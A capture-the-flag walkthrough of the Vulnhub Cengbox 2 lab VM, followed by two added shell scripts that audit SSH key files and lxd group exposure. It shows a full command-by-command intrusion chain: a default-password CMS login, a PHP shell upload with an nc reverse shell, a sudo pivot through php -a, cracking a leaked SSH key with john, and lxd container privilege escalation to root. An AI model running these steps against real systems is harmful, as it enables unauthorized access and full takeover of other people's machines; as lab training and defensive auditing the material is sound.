Vulnhub Cengbox 2 target machine: detailed walkthrough (privilege escalation using different methods)


Cengbox 2

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                              
                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:03      1      60  Unknown vendor                                                                                           
 192.168.56.100  08:00:27:ea:c7:5b      1      60  PCS Systemtechnik GmbH                                                                                   
 192.168.56.254  08:00:27:ee:62:de      1      60  PCS Systemtechnik GmbH            

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-22 20:09 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.253
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             209 May 23  2020 note.txt
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:99:9d:e0:bc:07:3c:4f:53:e5:bc:27:35:80:e4:9e (RSA)
|   256 fe:60:a1:10:90:98:8e:b0:82:02:3b:40:bc:df:66:f1 (ECDSA)
|_  256 3a:c3:a0:e7:bd:20:ca:1e:71:d4:3c:12:23:af:6a:c3 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site Maintenance
MAC Address: 08:00:27:EE:62:DE (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ftp 192.168.56.254 
Connected to 192.168.56.254.
220 (vsFTPd 3.0.3)
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||56112|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        119          4096 May 23  2020 .
drwxr-xr-x    2 0        119          4096 May 23  2020 ..
-rw-r--r--    1 0        0             209 May 23  2020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||5618|)
150 Opening BINARY mode data connection for note.txt (209 bytes).
100% |****************************************************************************************************************|   209      488.28 KiB/s    00:00 ETA
226 Transfer complete.

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat note.txt      
Hey Kevin,
I just set up your panel and used default password. Please change them before any hack.

I try to move site to new domain which name is ceng-company.vm and also I created a new area for you.

Aaron

Domain: ceng-company.vm

Possible usernames: kevin, aaron

Also: kevin's password may be weak

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ curl http://192.168.56.254           
<!doctype html>
<title>Site Maintenance</title>
<style>
  body { text-align: center; padding: 150px; }
  h1 { font-size: 50px; }
  body { font: 20px Helvetica, sans-serif; color: #333; }
  article { display: block; text-align: left; width: 650px; margin: 0 auto; }
  a { color: #dc8100; text-decoration: none; }
  a:hover { color: #333; text-decoration: none; }
</style>

<article>
        <h1>Site Maintenance</h1>
    <div>
        <p>Sorry, We don't serve yet. You can check later the site. Regards </p> <p>&mdash; Ceng Company Team</p>
    </div>
</article>

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo vim /etc/hosts                                        
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat /etc/hosts            
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254  ceng-company.vm

However, browsing to the domain ceng-company.vm returns the same page content as before.

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://ceng-company.vm
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,txt,js,sh
[+] Timeout:                 10s
===============================================================
2023/06/22 20:17:02 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 555]
/.html                (Status: 403) [Size: 295]
/.php                 (Status: 403) [Size: 294]
/.html                (Status: 403) [Size: 295]
/.php                 (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 303]
Progress: 1320683 / 1323366 (99.80%)

The directory scan turned up nothing useful. Are there any subdomains?

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ wfuzz -c -u 'ceng-company.vm' -H 'Host:FUZZ.ceng-company.vm' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 76
=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                     
=====================================================================

000000001:   400        12 L     53 W       422 Ch      "# directory-list-2.3-medium.txt"                                                           
000000003:   400        12 L     53 W       422 Ch      "# Copyright 2007 James Fisher"                                                             
000000007:   400        12 L     53 W       422 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                           
000000013:   400        12 L     53 W       422 Ch      "#"                                                                                         
000000011:   400        12 L     53 W       422 Ch      "# Priority ordered case sensative list, where entries were found"                          
000000010:   400        12 L     53 W       422 Ch      "#"                                                                                         
000000009:   400        12 L     53 W       422 Ch      "# Suite 300, San Francisco, California, 94105, USA."                                       
000000012:   400        12 L     53 W       422 Ch      "# on atleast 2 different hosts"                                                            
000000006:   400        12 L     53 W       422 Ch      "# Attribution-Share Alike 3.0 License. To view a copy of this"                             
000000005:   400        12 L     53 W       422 Ch      "# This work is licensed under the Creative Commons"                                        
000000008:   400        12 L     53 W       422 Ch      "# or send a letter to Creative Commons, 171 Second Street,"                                
000000002:   400        12 L     53 W       422 Ch      "#"                                                                                         
000000004:   400        12 L     53 W       422 Ch      "#"                                                                                         
000000259:   403        11 L     32 W       296 Ch      "admin"              

The admin subdomain returns status code 403.

Add this subdomain to the /etc/hosts file:

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo vim /etc/hosts
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254  ceng-company.vm
192.168.56.254  admin.ceng-company.vm

Browsing to admin.ceng-company.vm returns "Forbidden", so perhaps a directory scan is worthwhile:

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://admin.ceng-company.vm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.sh,.js
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://admin.ceng-company.vm/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              js,php,html,txt,bak,sh
[+] Timeout:                 10s
===============================================================
2023/06/22 20:31:01 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 301]
/.php                 (Status: 403) [Size: 300]
/.html                (Status: 403) [Size: 301]
/.php                 (Status: 403) [Size: 300]
/server-status        (Status: 403) [Size: 309]
/gila                 (Status: 301) [Size: 329] [--> http://admin.ceng-company.vm/gila/]

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://admin.ceng-company.vm/gila/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.sh,.js
===============================================================

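The login entry point is finally found.

Try the username kevin@ceng-company.vm with the password admin.

Upload shell.php; it turns out to be saved under the assets directory.

Visit the following URL:

http://admin.ceng-company.vm/gila/assets/shell.php

A shell is obtained successfully.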

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo nc -nlvp 5555                                         
listening on [any] 5555 ...
connect to [192.168.56.253] from (UNKNOWN) [192.168.56.254] 40688
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 17:39:51 up 34 min,  0 users,  load average: 1.04, 4.65, 3.25
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cengbox:/$ cd /home
cd /home
www-data@cengbox:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root    root       4.0K May 23  2020 .
drwxr-xr-x 23 root    root       4.0K May 23  2020 ..
drwxr-x---  4 mitnick developers 4.0K May 25  2020 mitnick
drwxr-xr-x  4 swartz  swartz     4.0K May 26  2020 swartz
www-data@cengbox:/home$ cd mitnick
cd mitnick
bash: cd: mitnick: Permission denied
www-data@cengbox:/home$ cd swartz
cd swartz
www-data@cengbox:/home/swartz$ ls -alh
ls -alh
total 44K
drwxr-xr-x 4 swartz swartz     4.0K May 26  2020 .
drwxr-xr-x 4 root   root       4.0K May 23  2020 ..
-rw------- 1 swartz swartz        1 May 26  2020 .bash_history
-rw-r--r-- 1 swartz swartz      220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 swartz swartz     3.7K Aug 31  2015 .bashrc
drwx------ 2 swartz swartz     4.0K May 23  2020 .cache
drwx------ 2 swartz developers 4.0K May 26  2020 .gnupg
-rw------- 1 swartz developers    1 May 26  2020 .php_history
-rw-r--r-- 1 swartz swartz      655 May 16  2017 .profile
-rw------- 1 swartz developers    1 May 26  2020 .viminfo
-rwxr-xr-x 1 swartz swartz       20 May 26  2020 runphp.sh
www-data@cengbox:/home/swartz$ cat runphp.sh
cat runphp.sh
#!/bin/bash

php -a
www-data@cengbox:/home/swartz$ 

www-data@cengbox:/var/www/admin/gila$ cat config.php
cat config.php
<?php

$GLOBALS['config'] = array (
  'db' => 
  array (
    'host' => 'localhost',
    'user' => 'root',
    'pass' => 'SuperS3cR3TPassw0rd1!',
    'name' => 'gila',
  ),
  'permissions' => 
  array (
    1 => 
    array (
      0 => 'admin',
      1 => 'admin_user',
      2 => 'admin_userrole',
    ),
  ),
  'packages' => 
  array (
    0 => 'blog',
  ),
  'base' => 'http://admin.ceng-company.vm/gila/',
  'theme' => 'gila-blog',
  'title' => 'Gila CMS',
  'slogan' => 'An awesome website!',
  'default-controller' => 'blog',
  'timezone' => 'America/Mexico_City',
  'ssl' => '',
  'env' => 'pro',
  'check4updates' => 1,
  'language' => 'en',
  'admin_email' => 'kevin@ceng-company.vm',
  'rewrite' => true,

www-data@cengbox:/$ sudo -l 
sudo -l
Matching Defaults entries for www-data on cengbox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on cengbox:
    (swartz) NOPASSWD: /home/swartz/runphp.sh
www-data@cengbox:/$ sudo -u swartz /home/swartz/runphp.sh
sudo -u swartz /home/swartz/runphp.sh
Interactive mode enabled

No entry for terminal type "unknown";
using dumb terminal settings.
php > system("/bin/bash")
system("/bin/bash")
php > id
id
php > ;
;
PHP Parse error:  syntax error, unexpected 'id' (T_STRING) in php shell code on line 2
php > system("/bin/bash");
system("/bin/bash");
swartz@cengbox:/$ id
id
uid=1001(swartz) gid=1002(developers) groups=1002(developers)
swartz@cengbox:/$ 

swartz@cengbox:/home/mitnick$ cd .ssh 
cd .ssh
swartz@cengbox:/home/mitnick/.ssh$ ls -alh
ls -alh
total 20K
drwxr-x--- 2 mitnick developers 4.0K May 25  2020 .
drwxr-x--- 4 mitnick developers 4.0K May 25  2020 ..
-rw-r--r-- 1 mitnick developers  397 May 25  2020 authorized_keys
-rw-r--r-- 1 mitnick developers 1.8K May 25  2020 id_rsa
-rw-r--r-- 1 mitnick developers  397 May 25  2020 id_rsa.pub
swartz@cengbox:/home/mitnick/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,21425CA12E394F02C77645793C350D91
-----END RSA PRIVATE KEY-----

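Copy the contents of id_rsa into a local id_rsa file on Kali Linux and change its permissions. The key turns out to be passphrase-protected, so crack the passphrase with john, which then allows logging in as mitnick: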

┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ chmod 400 id_rsa     
 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ssh -i id_rsa mitnick@192.168.56.254                           
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:uZvIZKaW470Qvua+TX3Wa1NqBXo7T/pWydAbAvGFVSQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa': 

                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ssh2john id_rsa > hash              
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash     
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
legend           (id_rsa)     
1g 0:00:00:00 DONE (2023-06-22 20:57) 2.702g/s 5232p/s 5232c/s 5232C/s amore..bubba1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ssh -i id_rsa mitnick@192.168.56.254                 
Enter passphrase for key 'id_rsa': 

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

166 packages can be updated.
119 updates are security updates.

Last login: Tue May 26 07:12:16 2020 from 192.168.0.14
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

mitnick@cengbox:~$ id
uid=1000(mitnick) gid=1002(developers) groups=1002(developers),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
mitnick@cengbox:~$ ls -alh
total 48K
drwxr-x--- 4 mitnick developers 4.0K May 25  2020 .
drwxr-xr-x 4 root    root       4.0K May 23  2020 ..
-rw------- 1 mitnick mitnick       1 May 26  2020 .bash_history
-rw-r--r-- 1 mitnick mitnick     220 May 23  2020 .bash_logout
-rw-r--r-- 1 mitnick mitnick    3.7K May 23  2020 .bashrc
drwx------ 2 mitnick mitnick    4.0K May 23  2020 .cache
-rw------- 1 mitnick mitnick     505 May 23  2020 .mysql_history
-rw------- 1 mitnick mitnick       1 May 26  2020 .php_history
-rw-r--r-- 1 mitnick mitnick     655 May 23  2020 .profile
drwxr-x--- 2 mitnick developers 4.0K May 25  2020 .ssh
-rw------- 1 mitnick mitnick      33 May 23  2020 user.txt
-rw------- 1 mitnick mitnick       1 May 26  2020 .viminfo
mitnick@cengbox:~$ cat user.txt
a10333b0b7c3f914e8c446fd8e9cd362
mitnick@cengbox:~$ 
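
The passphrase fell in under a second because the `Proc-Type: 4,ENCRYPTED` / `DEK-Info` header marks the legacy PEM format, which john reports above as the MD5/AES KDF with an iteration count of 1, and the key was reachable at all because `id_rsa` was mode 0644 in a group-readable `.ssh`. The audit script below is an added example, not part of the original write-up; the function names and finding labels are made up here, and the sample key is constructed with a placeholder body.

```shell
#!/bin/sh
# Added audit example (not from the original write-up): flag SSH private keys
# that are readable beyond their owner or use the legacy PEM passphrase scheme.

# key_findings FILE -> one finding label per line; no output if nothing is flagged.
key_findings() {
    f=$1
    # POSIX find mode test: group-read or other-read bit set on the key file.
    if [ -n "$(find "$f" -prune \( -perm -040 -o -perm -004 \) -print)" ]; then
        echo "readable-by-group-or-other"
    fi
    case "$(sed -n '1p' "$f")" in
        "-----BEGIN RSA PRIVATE KEY-----"|"-----BEGIN DSA PRIVATE KEY-----"|"-----BEGIN EC PRIVATE KEY-----")
            # Legacy PEM: the passphrase is stretched with a single MD5 round.
            if sed -n '2,3p' "$f" | grep -q '^Proc-Type: 4,ENCRYPTED'; then
                echo "legacy-pem-encryption"
            else
                echo "unencrypted-private-key"
            fi ;;
    esac
}

# audit_ssh_dir DIR -> "path: finding" for every private key file under DIR.
audit_ssh_dir() {
    find "$1" -type f ! -name '*.pub' | sort | while IFS= read -r key; do
        grep -q -e '-----BEGIN .*PRIVATE KEY-----' "$key" 2>/dev/null || continue
        key_findings "$key" | while IFS= read -r finding; do
            printf '%s: %s\n' "$key" "$finding"
        done
    done
}

# make_sample_key FILE -> constructed sample: same header lines and mode as the
# key in the session above, with a placeholder instead of key material.
make_sample_key() {
    printf '%s\n' \
        '-----BEGIN RSA PRIVATE KEY-----' \
        'Proc-Type: 4,ENCRYPTED' \
        'DEK-Info: AES-128-CBC,00000000000000000000000000000000' \
        '' \
        'CONSTRUCTED-PLACEHOLDER-BODY' \
        '-----END RSA PRIVATE KEY-----' > "$1"
    chmod 644 "$1"
}

# Demo on the constructed sample.
demo_dir=$(mktemp -d)
make_sample_key "$demo_dir/id_rsa"
audit_ssh_dir "$demo_dir"
rm -rf "$demo_dir"
```

Both findings are fixed with `chmod 600` on the key and `ssh-keygen -p -o -f <key>`, which rewrites it in the OpenSSH format with a bcrypt KDF.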


Because the mitnick user belongs to the lxd group, LXD can be used for local privilege escalation:

mitnick@cengbox:/tmp$ wget http://192.168.56.253:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2023-06-22 18:02:36--  http://192.168.56.253:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.253:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’

alpine-v3.13-x86_64-20210218_0139.tar.g 100%[============================================================================>]   3.11M  --.-KB/s    in 0.01s   

2023-06-22 18:02:36 (284 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]

mitnick@cengbox:/tmp$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
mitnick@cengbox:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
mitnick@cengbox:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
mitnick@cengbox:/tmp$ lxc start ignite
mitnick@cengbox:/tmp$ lxc exec ignite /bin/sh
~ # cd /mnt/root
/mnt/root # ls -alh
total 96K    
drwxr-xr-x   23 root     root        4.0K May 23  2020 .
drwxr-xr-x    3 root     root        4.0K Jun 23 01:03 ..
drwxr-xr-x    2 root     root        4.0K May 23  2020 bin
drwxr-xr-x    3 root     root        4.0K May 23  2020 boot
drwxr-xr-x   18 root     root        3.8K Jun 23 00:05 dev
drwxr-xr-x   92 root     root        4.0K May 26  2020 etc
drwxr-xr-x    4 root     root        4.0K May 23  2020 home
lrwxrwxrwx    1 root     root          33 May 23  2020 initrd.img -> boot/initrd.img-4.4.0-142-generic
drwxr-xr-x   22 root     root        4.0K May 25  2020 lib
drwxr-xr-x    2 root     root        4.0K May 23  2020 lib64
drwx------    2 root     root       16.0K May 23  2020 lost+found
drwxr-xr-x    3 root     root        4.0K May 23  2020 media
drwxr-xr-x    2 root     root        4.0K Feb 26  2019 mnt
drwxr-xr-x    2 root     root        4.0K May 25  2020 opt
dr-xr-xr-x  153 root     root           0 Jun 23 00:05 proc
drwx------    3 root     root        4.0K May 26  2020 root
drwxr-xr-x   27 root     root         960 Jun 23 01:03 run
drwxr-xr-x    2 root     root       12.0K May 23  2020 sbin
drwxr-xr-x    2 root     root        4.0K May 23  2020 snap
drwxr-xr-x    3 root     root        4.0K May 23  2020 srv
dr-xr-xr-x   13 root     root           0 Jun 23 00:54 sys
drwxrwxrwt    9 root     root        4.0K Jun 23 01:04 tmp
drwxr-xr-x   10 root     root        4.0K May 23  2020 usr
drwxr-xr-x   15 root     root        4.0K May 23  2020 var
lrwxrwxrwx    1 root     root          30 May 23  2020 vmlinuz -> boot/vmlinuz-4.4.0-142-generic
/mnt/root # cd root
/mnt/root/root # ls -alh
total 36K    
drwx------    3 root     root        4.0K May 26  2020 .
drwxr-xr-x   23 root     root        4.0K May 23  2020 ..
-rw-------    1 root     root           0 May 26  2020 .bash_history
-rw-r--r--    1 root     root        3.0K Oct 22  2015 .bashrc
drwxr-xr-x    2 root     root        4.0K May 23  2020 .nano
-rw-------    1 root     root           1 May 26  2020 .php_history
-rw-r--r--    1 root     root         148 Aug 17  2015 .profile
-rw-r--r--    1 root     root          66 May 23  2020 .selected_editor
-rw-------    1 root     root           1 May 26  2020 .viminfo
-rw-r--r--    1 root     root         518 May 23  2020 root.txt
/mnt/root/root # cat root.txt
  _____ ______             ____            ___  
 / ____|  ____|           |  _ \          |__ \ 
| |    | |__   _ __   __ _| |_) | _____  __  ) |
| |    |  __| | '_ \ / _` |  _ < / _ \ \/ / / / 
| |____| |____| | | | (_| | |_) | (_) >  < / /_ 
 \_____|______|_| |_|\__, |____/ \___/_/\_\____|
                      __/ |                     
                     |___/                      

I would be grateful for your any feedback. Feel free to contact me on Twitter @arslanblcn_

de89782fe4e8bf2198a022ae7f50613e
/mnt/root/root # 
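
Membership of the `lxd` group is effectively root on the host, as the session above shows with a privileged container and a disk device whose source is `/`. The audit script below is an added example, not part of the original write-up: it lists accounts in the `lxd` group and flags saved `lxc config show NAME --expanded` dumps that combine those two settings. The function names and finding labels are made up here, and the sample files are constructed from the names and IDs seen in the session.

```shell
#!/bin/sh
# Added audit example (not from the original write-up).

# lxd_members GROUP_FILE PASSWD_FILE -> accounts that can talk to the LXD daemon,
# via supplementary membership or via lxd being their primary group.
lxd_members() {
    awk -F: '
        FNR == NR {                                  # first file: group database
            if ($1 == "lxd") {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++) if (m[i] != "") seen[m[i]] = 1
            }
            next
        }
        gid != "" && $4 == gid { seen[$1] = 1 }      # second file: passwd database
        END { for (u in seen) print u }
    ' "$1" "$2" | sort
}

# container_findings CONFIG_FILE -> findings for one saved container config dump.
container_findings() {
    awk '
        function emit() {
            if (dev != "" && kind == "disk" && src == "/") print "host-root-disk:" dev
            dev = ""; src = ""; kind = ""
        }
        /^[^ ]/ { emit(); section = $1 }             # top-level YAML key
        section == "config:" && $1 == "security.privileged:" {
            v = $2; gsub(/"/, "", v)
            if (v == "true") print "privileged"
        }
        section == "devices:" && /^  [^ ]/ { emit(); dev = $1; sub(/:$/, "", dev) }
        section == "devices:" && $1 == "source:" { src = $2; gsub(/"/, "", src) }
        section == "devices:" && $1 == "type:"   { kind = $2 }
        END { emit() }
    ' "$1"
}

# write_samples DIR -> constructed sample data modelled on the session above.
write_samples() {
    cat > "$1/group" <<'EOF'
root:x:0:
sudo:x:27:mitnick
lxd:x:110:mitnick
developers:x:1002:
EOF
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
mitnick:x:1000:1002::/home/mitnick:/bin/bash
swartz:x:1001:1002::/home/swartz:/bin/bash
EOF
    cat > "$1/ignite.yaml" <<'EOF'
architecture: x86_64
config:
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false
profiles:
- default
EOF
}

# Demo on the constructed samples.
demo_dir=$(mktemp -d)
write_samples "$demo_dir"
lxd_members "$demo_dir/group" "$demo_dir/passwd"
container_findings "$demo_dir/ignite.yaml"
rm -rf "$demo_dir"
```

Any account the first function prints should be treated as a root-equivalent account, and removed from the group if it does not need to manage containers.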
